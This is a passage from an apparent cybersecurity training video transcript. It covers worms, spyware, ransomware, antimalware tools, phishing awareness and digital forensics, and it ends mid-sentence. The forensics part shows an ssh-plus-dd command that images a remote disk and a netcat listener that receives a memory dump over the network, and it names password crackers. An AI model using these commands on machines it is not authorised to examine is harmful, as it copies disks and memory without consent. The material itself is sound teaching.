malware that is often delivered through a Trojan mechanism. Now a Trojan means that the user has something
that appears to be benign, such as usable software that they might download and install. When in fact, that is
simply used as a tricking mechanism to deliver the malware to the user's PC or smartphone. Worms are self-
propagating over a network so they don't require an existing host file to attach themselves to. Worms get
spread when one machine gets infected either due to some kind of a vulnerability exploit. Or through social
engineering which is tricking the user into downloading something, or clicking a link, or opening a file
attachment. With a worm, network transfer is used to copy itself to other systems. So again, it's self-
propagating. This can be done through file and print sharing over the network, FTP, file transfer protocol, SSH
or secure shell, which is used to remotely administer network devices like servers, routers and switches over
the network. It can be transferred through email and instant messaging.
So basically, through many common communication techniques is how worms can spread themselves. Worm
infections, once they actually run, other than spreading themselves, might spy on computing habits. They
might steal sensitive information, such as sensitive files stored on your computer or that are accessible
elsewhere through your computer, such as on a database server or in the cloud. Or a worm might monitor
keystrokes. It might be a key logger and send those back to malicious users. Also a worm could redirect users
to fraudulent sites. So for instance, a worm could modify the local system's HOSTS file which is checked
before DNS servers to resolve names to IP addresses. So with this example, a malicious user might spy on your
habits and take note of your preferred bank for online banking. And then might make a HOSTS file entry that
redirects the same URL to a website under their control that looks just like the real banking site. But it's really
just designed to steal your banking credentials before displaying a message about the bank experiencing
technical difficulties. Worms, of course, can also consume enormous amounts of network bandwidth, which
could be an indication that this infection is underway. In this video we discussed worms.
[Topic title: Spyware, Adware. The presenter is Dan Lachance.] In this video, I'll discuss spyware. Spyware is
a form of malware, and like most malware, it installs and runs without the user knowing about it. Spyware,
specifically, is designed to secretly or covertly gather information about things like our computing habits, the
software that we use, files that we access and the contents within them, perhaps. As well as gathering
keystrokes that we might enter as we type on the keyboard. Including when we authenticate to various
resources, like internal servers, so it would reveal our credentials if we're using username and password to
authenticate, and also things like online banking and so on. So therefore, spyware gathers data that could be
very valuable for marketing purposes. So the motivation is clear, it could be for financial gain or it could be to
gather credentials to further compromise other systems or networks. Adware is another form of malware. And
like all malware, it installs and runs normally without user consent. However, that's not necessarily always the
case. Adware is designed to display appropriate advertisements. Now, what does appropriate mean in this
context? It means based on your computing habits, it somehow monitored what you've been doing, what
you've been searching for, and looking at on the Internet and displays related advertisements.
So it might look at things like sites that were visited, searches that were conducted, and just generally how the
computer is used. We want to be careful when we install free software. Because this is an example of how
spyware or adware might be installed and really not maybe specifically with our consent, but we had the option
to uncheck something that we didn't. So when you install free software, sometimes you have to be aware of
additional software installed with it. And if all you're doing is, in a rush, installing free software and clicking
Next, Next, Next through the installation wizard, you might not read a message that tells you it's going to
install something, like another browser plugin. Where, if you were a little less hasty, you could have
unchecked that additional software installation. Because it itself might be spyware or adware. So, basically, be
careful, take your time, it's all about being suspicious, to be honest, about these things. And read all
agreements before you install things like free software. Now of course, as is the case with all malware, we
want to make sure we're running up-to-date antimalware software on every network device. Now, this might
even include installing a browser plugin to block ads. But again, be careful. Because sometimes malware
shows up itself as being antimalware. So be very careful. In this video, we talked about spyware and adware.
[Topic title: Ransomware. The presenter is Dan Lachance.] In the real world, a ransom payment is required
when something of great value to somebody is being held by an unauthorized party. In this video, we'll talk
about ransomware. Ransomware is a rampant form of malware that is spreading all over the world in 2016,
although that's not when it began. But it seems to be more prevalent than ever, now. In it's most common form,
ransomware will encrypt files where the victim has write access to files. That includes locally on a device and
even over the network, including into the cloud. So what happens is, when a malware infection, which is
ransomware, initiates it will contact a command center on the Internet awaiting instructions from the malicious
user. A ransom payment is demanded. And in turn, the attacker will provide a decryption key, or so they claim.
Other variants of ransomware would prevent computer access, maybe upon boot up. It requires some kind of a
special code, and unless payment is received, then the code is not provided. So therefore, the system is not
usable. Now, ransomware scare tactics include legitimate looking logos or sites that look like the real thing,
but in fact, are not.
Now, often, these scare tactics would include messages that appear to be coming from law enforcement. For
example, if you're on the Internet conducting searches, you might get a pop-up message that even includes the
local law enforcement logo that looks legitimate and demands payment. Otherwise, you could face
imprisonment based on what you've been looking at in the Internet. The same kind of thing also happens
through tax agencies. Everybody has to pay taxes, but many people don't like it, and they're very much afraid
of the taxing authorities. So if we get a message, whether it's a pop-up in our browser or an e-mail message
saying that either we have a tax refund, or in terms of a scare tactic, telling us that we owe tax money in
arrears, most people will be fooled into thinking that they must do this. And, in fact, when they submit a
payment, it's actually going to the malicious users. Consider the example on-screen, which is a real e-mail
message that I received a while ago. [A screenshot of a fraudulent mail is displayed in which the sender's e-
mail address is fake. The mail includes a link titled Your request can be made here.] This message claims to
be from the Canada Revenue Agency, but up at the top, if we take a look at the e-mail address, that does not
look legitimate. And, essentially, I can make a request simply by clicking the provided link, to claim my
refund of $318.12 in Canadian funds. Now, of course, this is not a legitimate e-mail message, it's a phishing e-
mail.
And when I actually click the link, it might simply gather some personal information about me. Or, it could
infect my computer and perhaps even encrypt files using ransomware. Consider this second example where we
have a message in a browser that appears to come from the Royal Canadian Mounted Police that says that all
of the files on our machine are encrypted. [A screenshot of a web site purporting to be the web site of the
Royal Canadian Mounted Police is displayed.] And this is due to a violation on our part of some kind of law,
whether it's copyright infringement, viewing or distributing prohibited pornographic contents, or some kind of
illegal access from our PC. Now, of course, unsuspecting victims get afraid and will pay a ransom, and also
pay a fine of some kind so that they get their machine back and also avoid imprisonment. It's just another scare
tactic invoked by scammers. So any time you get these messages or e-mail, it could be e-mail or a web pop-up
or something like that from some kind of authority, like another government agency of some kind, always
question it twice. And if you need to, make a phone call.
Don't just click on links randomly because you feel threatened in some way based on the message that you're
seeing. With a ransomware infection, this can often be propagated by downloading Internet files, or by
installing software that appears legitimate, but might also be infected as well. We might infect our machine
with ransomware by visiting a webpage, by clicking a link, either on a webpage or through e-mail, even by
opening an e-mail file attachment that has some kind of an autorun virus. Ransomware payment is usually
requested in Bitcoin, where Bitcoin is unregulated. That doesn't necessarily mean it can't be traced, but it's not
regulated by any single governing authority. However, even if you make a ransomware payment, there is no
guarantee that you will get a decryption key or a code to unlock your computer.
However, in some cases, ransom payment may actually be cheaper than spending the time to recover systems
and data through imaging and through backups. That's not to say that we should pay ransom, but it's just a
general consideration. Encryption mechanisms for ransomware might be through a Microsoft Word macro
virus that executes PowerShell commands. So we should always run up-to-date antimalware software. And, of
course, user awareness. Users need to be aware of how these infections actually occur, because it only takes a
single user to click on one link, or open one file attachment, to bring down the entire network. So users must
understand that they should never open unexpected file attachments or click links sent via e-mail. If they don't
know what to do, they should open a help desk ticket, and then we can escalate it further. The other thing is to
make sure that we have frequent and working backups. Because if by chance we do get hit with some form of
ransomware, we need an alternative way to get our data back. And hopefully, our data is recent and it works.
In this video, we discussed ransomware.
[Topic title: Antimalware. The presenter is Dan Lachance.] In this video I'll demonstrate how to work with
antimalware. antimalware is software that will try to detect, catch, and maybe quarantine or remove malicious
software, whether that be in the form of worm, a Trojan, or a virus attached to a file and so on. And it's critical
that we have antimalware software up to date on every device on the network including smartphones. Here in
Windows 10 I'm going to go ahead and launch the Windows Defender antimalware, although there are many
different vendors that offer solutions. [Dan launches Windows Defender from the desktop. The Windows
Defender window opens which displays three tabs named Home, Update, and History. The window includes
three scan options and a Scan now button.] Here I can see that real-time protection is turned on. [The Home
tab is selected by default and options such as real-time protection and Virus and spyware definitions are
displayed. There are two links for Settings and Help in the top right-hand side section of the window.] So that
means not only will it scan for malware on either a manual or a scheduled, triggered basis, but it's always
watching what is happening on the machine. Whether I'm opening email file attachments or opening files from
inserted USB thumb drives and so on. I can also see that the virus and spyware definitions are up to date on
this machine. Down below, I can also when the last scan was conducted. Here it says September 14th, 2016
and it was just a quick scan. Over on the right, I can manually trigger a quick, full, or customized scan on
demand.
So for example, if I were to choose Custom, and choose Scan now, I can then choose which drives and folders
that I want to scan. [The Windows Defender dialog box opens which displays the drives and folders which can
be selected for scanning. The window includes two buttons named OK and Cancel.] However, I'm going to
cancel that. Under the Update tab, [Dan clicks the Update tab which includes the update definitions
button.] we can see here our virus and spyware definition database is up to date. And we can see the date and
time at which that applies. We can also see the specific version of our virus and spyware definitions, which can
be important when troubleshooting. Now we also have a button here where we can manually click on Update
definitions. Under the History tab, [He clicks the History tab it includes the View details button.] we'll have a
history of any quarantined, allowed, or detected items. Here I'm going to choose All detected items and I'll
click the View details button. Here we can see at one point it detected a Trojan on this machine. The alert level
was severe. This is the date on which it was detected and then, of course, it was quarantined. [The History tab
now displays the Remove all button.] Now at this point, I do have the option, of course, of removing that
Trojan from this host. In this particular software, Windows Defender, we can also click on the Settings link in
the upper right. And when I do that, [The Update & Security settings window opens. The window is divided
into two sections. The first section displays many tabs such as Windows Update, Windows Defender, and
Backup. The second section displays information related to the selection made in the first section. The
Windows Defender tab is selected by default and the second section displays many sections such as Real-time
protection, Cloud-based protection, Exclusions, Version info, and Automatic sample submission.] it spawns
the Update and Security settings here in Windows 10, where Real-time protection can be turned on or off,
where Cloud-based protection can be turned on or off. So the Cloud-based protection will send information
about detected malware on our computer to Microsoft. We also have the option, if we scroll further down, and
we do in every antimalware type of solution, we can exclude certain types of files or folders that we know will
trigger a false positive.
So I could exclude a file or a folder. [The ADD AN EXCLUSION window opens which displays sections such
as Files and folders, File types, and Processes.] Here I've got a folder I've excluded where I've got some live
hacks stored for testing purposes. We can also exclude certain file types or individual processes. Larger
networks will work with antimalware from a centralized tool. [He switches to the System Center Configuration
Manager window. The window displays many buttons such as All Objects, Saved Searches, and Close. Below
these buttons, the window is divided into two sections. The first section displays the Assets and Compliance
subsection along with tabs for Assets and Compliance, Software Library, Monitoring, and Administration. The
Assets and Compliance tab is selected by default. The second section displays information related to the
selection made in the first section. The Assets and Compliance subsection displays the Overview node which
includes many subnodes such as Device Collections, Asset Intelligence, Compliance Settings, Endpoint
Protection, and All Corporate-owned Devices.] In this case, we're looking at System Center Configuration
Manager 2012. Where we've already gone to the Assets and Compliance work space in the bottom left. Well,
on left-hand navigator, I'm going to expand Endpoint Protection. System Center Endpoint Protection, often
referred to as EEP, is the antimalware solution included with SCCM, although it must be licensed separately.
So notice here on the left we can click on Antimalware policies. [The Endpoint protection subnode includes
subnodes such as Antimalware Policies and Windows Firewall policies.] And on the right, any antimalware
policies that were created, of course there's a default one, will be listed. So for instance, I'm going to go ahead
and double-click on the Default Client Antimalware Policy to open up its settings. [The Default Antimalware
Policy window opens. The window is divided into two sections. The first section includes many tabs such as
Definition updates, Advanced, Exclusion settings, Real-time protection, Default actions, and Scan settings.
The Scheduled scans tab is selected by default.] Where on the left, if I click Scan settings, on the right I see
Scan settings, such as whether we should be scanning email and attachments or removable devices like USB
drives. Or should we scan network drives when conducting a full scan? Should we scan archived files, and so
on. Now also, we can click Real-time protection over on the left to determine whether real-time scanning is
turned on and exactly how that is configured.
We have Exclusion settings. Under Advanced over here, we can determine whether our System Restore point
should be taking on clients before the machine is cleaned, and so on. So finally, the last thing we'll talk about
with this solution is the Definition updates over here on the left. Where we can determine exactly, [He clicks
the Definition updates tab and the second section displays buttons such as Set Source, Set Paths, OK, and
Cancel.] by clicking the Set Source button, where the updates come from [The Configure Definition Update
Sources window opens. It displays many definition update sources to be contacted.] and how often they are
applied. So really, we're doing the same kind of thing that we could do on a single station. The difference
being that we're doing it centrally and it could potentially apply to thousands of computers. Because here in
SCCM, [He exits the Default Antimalware Policy window. The System Center Configuration Manager window
displays two Antimalware Policies, Default Client Antimalware policy and Toronto Antimalware Settings for
Endpoint.] when I right-click on a policy, now the default client policy doesn't give me the option to deploy it
to a specific collection. But if I've built a custom policy I can determine, [He right-clicks the custom policy
and from the shortcut menu, chooses Deploy.] by choosing Deploy, exactly which collections that these
antimalware settings will apply to. [The Select Collection dialog box opens.] The default settings apply to all
devices managed by this SCCM site. So there are enterprise-class tools to essentially work with things like
antimalware. And of course, if I go to the Monitoring workspace over here on the left, [He clicks the
Monitoring tab.] and if I expand, Reporting and Reports in the left-hand navigator, I'll see that I have some
report categories. [The Reports subnode displays many subnodes.] Some of which are related to working with
things like malware. So for example, if I were to click on Reports and then click the Search bar at the top and
then simply type in malware to search for reports that have that term in it. We can see we've got a number of
antimalware reports that we can run.
Now what about zero day exploits? [The Enhanced Mitigation Experience Toolkit window is open. The
window includes buttons named Wizard, Apps, and Trust.] Those that aren't yet known to the system owner or
vendors of hardware and software but, of course, are known to malicious users. Well, there are different tools
we can use to mitigate those types of problems. Here I have installed and launched the Enhanced Mitigation
Experience Toolkit, or EMET. This is a free Microsoft tool. Let's go ahead and expand it and work with it a
little bit. The overall purpose of this tool is to prevent vulnerabilities in our software configurations, whether
it's operating system or apps, from being exploited. Even though there might not be a specific exploit signature
for this type of activity. Here in the bottom screen of EMET, we can see the list of running processes and
whether or not they are running EMET. So we can see none of them are. We see a list of running processes on
this host. So what we're going to do then is click the Apps button up in the toolbar where we can add an
application that we want EMET to monitor. [He clicks the Apps button and the Application Configuration
window opens.] We can see some standard apps here like iexplore.exe for Internet Explorer, WordPad,
Outlook, Word, Excel, PowerPoint, Access, Publisher, and so on. What I'm going to do is click the Add
Application button way up at the top. And we're going to go here into drive C on this machine.
We're going to go to Program Files. And we're going to scroll down and go into 7-Zip where we're going to
choose the 7z.exe program to make sure that we monitor it for any kind of vulnerability exploits. 7-Zip is a
compression tool. I'm going to go ahead and click Open. And we can see that 7-Zip has been added and most
of the check marks for these mitigations are enabled. For example, ASR stands for Attack Surface Reduction.
ASR really is concerned primary with things like browser plugins, things related to Java plugins, PDF reader
plugins or Flash plugins. EAF over here on the left stands for Export Address Table Access Filtering. What
this allows EMET to do is to capture any Windows API calls that are triggered from potentially harmful or
suspicious locations, such as an ActiveScript running on a web page. So besides just antimalware we can also
use tools such as Microsoft Enhanced Mitigation Experience Toolkit to prevent bad things from happening on
a device.
7. Video: User Training and Awareness (it_cscybs_11_enus_07)
After completing this video, you will be able to explain why user training and awareness is one of the most
important security defenses.
Objectives
explain why user training and awareness is one of the most important security defenses
[Topic title: User Training and Awareness. The presenter is Dan Lachance.] Many network infections still
occur from inside the network and not necessarily due to malicious users, but rather a lack of user awareness.
In this video, we'll talk about user training and awareness, which really turns out to be the single most effective
defense against threats. During user onboarding when we are hiring new employees, whether they be IT
technicians or not, it doesn't matter, everyone needs to be involved. User onboarding needs to include security
documentation for new employees, as well as training about security threats. We might also conduct ongoing
lunch and learn sessions for existing employees since the threat landscape is ever changing. We might also
have colorful and interesting and fun IT security posters in the office to increase general awareness about
security threats. We might also include some kind of a security tips and hints web site. Also, monthly company
newsletters are often done in larger organizations. They have news about the organization, maybe employee
birthday announcements. But they should also include some information about security awareness. So ongoing
IT security awareness and training is absolutely paramount. Now what should users do about this? Well,
through their awareness training, they should be made aware of social engineering. Essentially, it might be
cynical, but users must become of the mindset that everybody is trying to trick them. Because in this day and
age of digital communications, it's quite easy to receive an SMS text message on your phone that you didn't
ask for or the same thing is true of receiving an email message in your inbox that you didn't ask for.
So therefore users need to be vigilant about suspicious people, physically, that they might notice on a property
or in the building, but also suspicious about computer activity. So therefore, part of user training and
awareness needs to include who should be notified when suspicious people or computer activity is noticed.
Users must also be trained to pay attention to free software installation options, where additional software
might be installed, including spyware. Now in some cases, many corporate enterprises will prevent the
installation of user software, unless performed by an IT technician. Then there's always the telling of others
about IT security to spread the word about what to watch out for. Pictured on the screen, we can see a
screenshot of somebody downloading a file attachment, which apparently comes from Western Union for a
money transfer. But we can see the antivirus message about this being a Trojan. [He switches to the MS
Outlook window where an inbox is displayed.] Consider on the screen this email message that appears to be
from the Bank of Montreal or BMO, that tells me in the subject line that login has been disabled but the date
and time. Now if I click to open up that email message, I can see the detail about that message. Now, take a
look up at the email address up at the top, utah.edu. That doesn't look like it's coming from the Bank of
Montreal Internet domain name. Here it tells me that my online web portal login has been temporarily disabled
due to too many unsuccessful login attempts.
So my bank account is locked and so are all of my funds, and I've got a nice convenient link here I can click to
reset my password so I can continue with online banking with Bank of Montreal. Of course, the strange thing
is, I am not a Bank of Montreal member and even if I was, banks and law enforcement agencies and
government agencies will never contact you in this way asking you to click a link. It just doesn't happen, the
problem is a lot of people don't know this. So what should users watch out for? Users should not download
BitTorrent files or hastily install free software without reading the terms of agreement or installing additional
plug-ins. Users should never visit illegal web sites of any kind. They should never open unexpected email file
attachments or click links in email messages, especially if it's not something that they asked for. Now, in some
cases when you try to login to a web site, if you forget your password, you'll click the Forgot Password link.
And it will send an email message to reset the account to your email address. In that case, you triggered it, but
if you get email messages about resetting passwords that you didn't ask for, it's a scam.
So users must never be fooled by this and if they're not sure, they need to contact the help desk to find out if
it's legitimate or not. Other security awareness topics for users include physical security, such as making sure
they don't leave sensitive documents on the top of their desks. Making sure that they use lockdown cables for
laptop computers and that they don't leave USB thumb drives or smartphones in airports or forget them on
coffee tables at coffee shops. So a clean desk policy, password security, the shared use of work devices should
always be discouraged. Wireless network security must be made known to users in the sense that it's very easy
for a malicious user to create a rogue access point that looks like a legitimate wireless access point. Once the
user associates with that access point, the attacker potentially could see sensitive information that the user is
sending through that wireless access point. We now know of the danger of phishing email messages because
we've looked at a few examples here. And, of course, we know about malware and how it can be delivered and
once a machine is infected what it might do, such as spying on your computing habits or encrypting files that
you have write access to. In this video, we talked about user training and awareness.
After completing this video, you will be able to describe digital forensics.
Objectives
[Topic title: Digital Forensics Overview. The presenter is Dan Lachance.] In this video, we'll have a chat
about digital forensics. Digital forensics is the collection and investigation of digital data. The term triage
relates to this in that it allows for the prioritization of forensic tasks. Whether we are going to a suspect's
premises to seize equipment, or data on the equipment, or even trying to seize data stored in the cloud. The
integrity of evidence needs to be maintained. We must follow the chain of custody so that we can always track
who had access to collected evidence and where and how it was stored. Hashing allows us to get a unique
value for data that can be used in the future to detect changes. So therefore, we can verify a hash prior to
analysis of seized data to ensure that it matches the acquisition hash, so we know that nothing's been changed.
We can also use tamper-proof seals for physical evidence to ensure that data is kept safe, and equipment. All
activities need to be documented when gathering and then storing evidence. Data sources for digital forensics
includes network transmissions, log files, data files, even the swap files that are used for temporary storage of
memory pages. As well as active memory RAM pages, which could include information related to active
network connections at a specific point in time or running processes running on a specific point in time which
could be crucial in getting some kind of a conviction in a court of law.
Naturally, if we are going to use these data sources they have to be trustworthy as do the date and timestamps
associated with them. Other data sources include disk partition tables, the contents of boot sectors, file
allocation tables, which are used for every file system on a disk partition. Things like cloud backups might be
used. So if we seize a suspect's mobile phone, for example, there might not be anything incriminating on it, but
if we track its access to cloud services, there might be something that was backed up to the cloud that could be
of value. And in some cases, cloud backups are automated, which might even be unknown to a suspect. Then
of course, digital forensic media can gather data from removable media, which includes USB thumb drives and
external hard disks and so on. Forensic analysis then analyzes the data after we've got an acquisition hash.
Now, the term big data is being thrown around a lot these days, and it refers to the large volumes of data that
must be processed to look for something meaningful. And that certainly applies to forensic analysis because
depending on how much data is gathered, there is a specific amount of time that's required to parse and
produce results from those large data sets. So often what gets used in forensic analysis are some kind of
clustering solution such as BinaryPig on Hadoop clusters, where we've got multiple computers working
together to process data.
And this is also easily deployed in the cloud where we can very quickly spin up clusters for big data forensic
analysis, and once it's finished, we can then deprovision it so we're no longer paying for the use of that
clustering service. For example, consider the Amazon Web Services that are available with users that have
accounts to Amazon Web Services. [He switches to the amazon web services web page. The page is divided
into two sections. The first section displays many subsections such as Compute, Developer tools, Analytics,
and Internet of things. The second section displays subsections such as Resource Groups and Additional
Resources.] If I scroll down on the main page under Analytics, I can click on EMR, which is Elastic Map
Reduce, which is a managed Hadoop framework to basically run large scale analytics on large data sets [He
clicks the EMR icon.] . So from here I can click on the Create cluster button to begin defining my
configuration to process large volumes of data, [The page displays information on the Amazon Elastic
MapReduce.] which could be very useful for forensic analysis. In this video, we discussed digital forensics.
During this video, you will learn how to determine which forensic hardware is best suited for a specific
situation.
Objectives
In this video, you will learn how to determine which forensic software is best suited for a specific situation.
Objectives
[Topic title: Digital Forensics Software. The presenter is Dan Lachance.] Just like a carpenter requires a
toolbox with the correct tools to ply their trade, the same thing is true of a digital forensics analyst. They need
the correct hardware and software. In this video, we're going to talk about digital forensics software. So
besides having to correct hardware for disk imaging or even things like crime tape to seal off a scene, at the
software level there are some commonalities within digital forensics software. Most of them will support write
blocking to protect any changes being made to originating data. This is often done through file and metadata
hashing. A hash is a unique value based on the state of data, in this case, when it was acquired. And we want to
do that before we perform any kind of data analytics on acquired evidence. So, commonalities of digital
forensics software also includes the preservation of original evidence, safekeeping and tracking and correct
date and timestamps. So often this will be conducted from a digital forensic workstation where, it might also
perform OS and process analysis. Looking for anomalies or looking to date and timestamp the state of an
operating system and running processes at the time of evidence acquisition. There's also, in the same way, file
system and RAM analysis at the time of evidence acquisition. Some digital forensics software that can be used
is built in to operating systems like the standard UNIX and Linux dd, or disk dump command. This can also be
used locally, as well as remotely over the network, where we can capture slack and unallocated space on a
disk, not just capturing what's in use. This way we can track things that were removed in the past.
We can also send captured data using disk dump to a specific TCP or UDP port. Pictured in our
example, [Dan refers to following code: ssh [email protected] dd if=/dev/sda of=/acquired/disk1.img. Code
ends.] we can see over the network a forensic analyst executing the ssh command to connect as root over the
network to a device with a specific IP address and then remotely running the dd command. Now the dd
command specifies an input file, in this case /dev/sda, the entire disk. And the of command for output file
where we're storing data in an image file called disk1.img in an acquired folder. Now you must be careful
when gathering evidence as to where you store this. Here it's being stored on the remote machine that we're ssh
actioning into. But also any forensic analysis that captures that state of network connections and so on must
account for the fact that we are connecting over the network to gather this evidence. The forensic toolkit is
often called FTK. This is a widely used toolkit that includes many different forensic analysis tools such as
those related to disk scanning, deleted file recovery. It supports disk imaging and hashing. It also supports
distributed processing for processing big datasets when we're conducting forensic analysis. This can be used to
reduce case processing time. EnCase is another popular digital forensics tool suite that contains things that
support automation by exposing APIs.
It supports eDiscovery, or electronic discovery, of evidence and also forensic data recovery and analysis. The
BlackBag MacQuisition tool is for Macintosh forensic imaging and analysis for MacBook Pros and MacBooks
and MacBook Air devices. However, it's not designed to acquire data from iPhones or iPads. The X1 Social
Discovery tool is also another eDiscovery tool focused on social media content. As related to sites like
Facebook, Twitter, and LinkedIn to name just a few, as well as visited websites and YouTube activity. Other
common forensic software titles include various password crackers, such as Cain and Abel, or the Helix tool,
the Sysinternals Suite, and Cellebrite. In this video, we talked about digital forensics software.
After completing this video, you will be able to explain how forensic tools can be used against data stored on
media.
Objectives
explain how forensic tools can be used against data stored on media
[Topic title: Digital Forensics and Data at Rest. The presenter is Dan Lachance.] In this video, I'll talk about
digital forensics and data at rest. Data at rest is data that is stored on some kind of storage media. Often, when
we conduct forensic analysis and evidence gathering, we must use specifically approved tools. For example,
we might have to use Encase or the Forensic Toolkit imager tool. What we must do when we gather data at rest
for evidence is encrypt forensic images for safe keeping. We must also follow the chain of custody to ensure
that all activity related to gathered evidence, where it's stored, how it's stored, who had access to it, this all
must be logged diligently. Otherwise, the data might be deemed inadmissible in a court of law. Forensic
images can then be mounted for analysis purposes. Now, the options and visibility of the data when that
forensic image is mounted, really depends on the tool that's being used to mount the forensic image. A forensic
clone is a duplicate of a disk, whereas a forensic image is a file that contains a duplicate of the data from a
source disk. Now, forensic images are much more common than forensic clones.
The Encase file format for example, is very common, where it uses an E01 evidence file image format.
Forensic disk images can be taken of the traditional hard disk drives, or HDDs, which are the traditional
magnetic hard disks with spinning platters, or the newer SSDs, or solid state drives. Forensic disk images are a
bit-level copy of a disk partition that reflects the file system at a specific point in time. It also includes slack in
unallocated space on the disc, which can be useful to see deleted file remnants. Timestamps are crucial in
terms that they be trusted from a trusted time source. File hashes are also important that they are taken of
acquired data before we actually analyze the data and potentially make changes, despite the fact that we might
be using hardware or software write-blockers. With digital forensics and data at rest analysis, live imaging
means that the system is not powered down when we are acquiring disk images. Now, this is crucial if disk
encryption is in use on a suspect's machine and we don't have the decryption key.
Many disk encryption solutions protect data at rest when the system is powered down or if someone physically
steals the disk. But when the operating system is up and running, often, the disk volume contents are decrypted
and are therefore usable as usual. Dead imaging refers to the acquisition or analysis of disk data when the
system is powered down. So, often, the disk is removed and disconnected from that station and instead
connected to a forensic station. Now, hardware and software write-blockers can prevent data alterations when
we make a copy of that data. In this video, we discussed digital forensics and data at rest.
[Topic title: Common Digital Forensic Tools. The presenter is Dan Lachance.] In this video, I'll talk about
common digital forensic tools. So, why are there specific forensic tools? Well, first of all, often they're use for
evidence gathering, whether it's hardware or software. And at the same time, we need to wait here to the Chain
of Custody, where access to acquire evidence or how data is acquired for evidence is documented along every
step. There's also the trustworthiness of data that is gathered to make sure that we know that we've original
data and we can track whether or not it's been modified. And also having a trustworthy date and time stamp
source. There are open and closed source tools that can be used for digital forensic analysis. Forensic tool
categories begin with image capturing. Tools that do this work with things like storage media, whether it's an
external USB drive, an internal disc array, or an SD card and so on, where often, they are hashed. Now, by
hashing an entire file system, we are generating unique values for everything on that file system, all the files,
so that if there are any changes made in the future, we can detect that changes were made. There are also ways
to capture volatile memory or RAM contents, physical memory. So we can acquire that locally. For instance,
by running a tool on a machine that's on, acquiring a memory dump and perhaps storing it on removable
media. Or, the memory dump data could be sent over the network to another host.
There are also email forensic tools. Part of what they will do is take a look at SMTP headers. SMTP headers
are essentially metadata about the email message, including the path that was used to send it. And sometimes,
different mail systems will form SMTP headers in different ways. And we might even check to see how the
fields in the SMTP header are constructed to determine if the SMTP message in fact was forged. There are also
ways and tools to take a look at encrypted and digitally signed message and to take a look at the safekeeping of
private keys. Private keys are used to actually create a digital signature, which is used to verify the authenticity
of a message. And private keys are also used to decrypt messages encrypted to an individual. Other forensic
tool categories relate to the database level, where we can dig down into the database and its tables and look at
the data itself and also the metadata. We can also determine if row updates occurred and who did them. And
we can also analyze specific transactions used by a back-end database system. Network forensic tools are
designed to capture network traffic, but their placement on the network can be important so that they're
capturing the appropriate traffic.
For example, in a standard Ethernet switched environment, when we're plugged into one port in the switch, we
only see the traffic sent to that port from other devices on the network. Of course, that's besides multicasts and
broadcasts. We also have to bear in mind the ease with which packets can be spoofed using freely available
tools when we are capturing traffic for forensic analysis. Other forensics tools categories can include mobile
devices. Where we've got tools that can actually take a copy and hash of SIM card contents. Most mobile
devices these days also have some form of cloud backup. So, often, a digital forensics investigator will have to
take a look at any cloud account information that was synchronized from that mobile device up into the cloud.
A faraday bag, or cage, is used to make sure that we don't have any signals that can be transmitted or received
via wireless device. Finally, we might even take a look at the carrier themselves, for example, a telecom
carrier, and ask for their logs related to activity on a given smartphone. There are built-in operating system
tools that we can use for things like forensic analysis. So think, for example, of the Unix and Linux dd or disk
dump command, which can actually be used to take a copy of an entire disk or partition. There's also the built-
in Unix or Linux md5sum command, although that may vary from one distribution to the other, but it allows us
to take a filehash. On the Windows side, we can use the Get-filehash PowerShell cmdlet to take a hash of a
file. Then of course, there are numerous external tools that can be used by forensic analysts, including Encase,
the forensic toolkit or FTK, and Helix. In this video, we talked about common digital forensic tools.
After completing this video, you will be able to explain the sequence of steps that should be followed when
conducting mobile device forensics.
Objectives
explain the sequence of steps that should be followed when conducting mobile device forensics
[Topic title: Mobile Device Forensics. The presenter is Dan Lachance.] In this video, we'll have a chat about
mobile device forensics. When we have a locked phone that we need to gather evidence from, it can present a
problem. Because attempting to unlock the phone itself will change the device data. Web browser cookies, for
example, Safari web browser, stores cookies in /private/var/mobile/Library on an iPhone, can be viewable with
a HEX editor or using an iPhone Extractor tool. There's also the call history on a mobile device. For example,
the iOS uses SQLite data stored in /private/var/Library/CallHistory to store call data. Now, interestingly, when
it comes to locked phones, it really depends how important it is to law enforcement to get into it. If you think
about the fact that the FBI in 2016 paid a company $1 million as a one-time fee to be able to break into the San
Bernardino shooter's iPhone. Other data sources for mobile device forensics includes the memory on the
phone, as it's running.
Internal and removable storage media. Network traffic into and out of the mobile device. Logs for things like
the operating system of the mobile phone as well as for apps. SMS text messages. SIM card contents, which
could include phonebook entries, as well as SMS messages. So we should be able to create an image of an
entire mobile device file system and generate hashes before we start analyzing that acquired data. Common
Android tools related to forensics include, Logcat, ClockworkMod Recovery, Linux Memory Extractor, as
well as the Android SDK. Now some tools may require rooting the device so that they have full access to the
device. Common iOS tools for Apple mobile devices include iTunes Backup. So, just because we seized an
iPhone for example, and there's no relevant data that we can see on the device, perhaps that data existed in the
past and was backed up through iTunes Backup in the cloud. There's also other tools for iOS devices, like the
iPhone Analyzer, iPhone Explorer and various tools available with the Lantern Forensics suite. On the iOS
side, some tools might actually require jailbreaking the device so it has full access to the iOS device. In this
video, we chatted about mobile device forensics.
[Topic title: Creating a Physical Memory Dump. The presenter is Dan Lachance.] During forensic evidence
gathering, it can sometimes be critical that we capture an image of what was happening in memory, electronic
memory or RAM at the time that evidence was seized. There are many ways we can do that and in this video,
we're going to learn how to create a physical memory dump. Now there are plenty of tools that will run on
Windows, Unix, and Linux. Some of the tools might run off a USB thumb drive that you plug into the machine
itself, whose memory you want to get a dump from. And then maybe you would store the memory dump on a
USB removable drive or send it over the network. [The root@kali window is open.] The way that we're going
to do it here is we're going to begin in Kali Linux using a Netcat listener, or nc as you can see with the
command. We're going to listen for connections over the network where we can receive a memory dump taken
of a machine elsewhere. So the command here in Kali Linux is nc, for Netcat, -l for listen, -vvv. Basically, the
more Vs you have, the more verbose the output is, believe it or not. -p for the listening port, which here is
going to be 8888. And then that's followed by the redirection symbol, the greater than sign. So that we're
redirecting whatever we receive through this port to a file on this Linux host called clientmemdump1.dd. Let's
go ahead and press Enter to start that listener on Kali Linux. And now it says listening on [any], which means
any interface on port 8888. So I'm looking at a Windows machine where Internet Explorer is connected to a
banking website. [The rbc.com web site is open in Internet Explorer.] What we want to do is get a memory
dump of this machine. So there are many ways to do that. What we are going to do is go to the Start menu and
go to My Computer, where we've got a tool that was downloaded than can actually acquire a memory dump
and send it somewhere, like over the network.
And that tool is called Helix. [Dan clicks the icon for the Helix tool.] If I go ahead and run the Helix tool it
gives me a warning [The wizard is open.] that says the fact that you're running this tool is modifying this
system. So when you're gathering evidence, that is important to note and it must be documented. I'll accept that
by clicking the Accept button. And I'm going to click the Camera icon on the left to acquire a live image. The
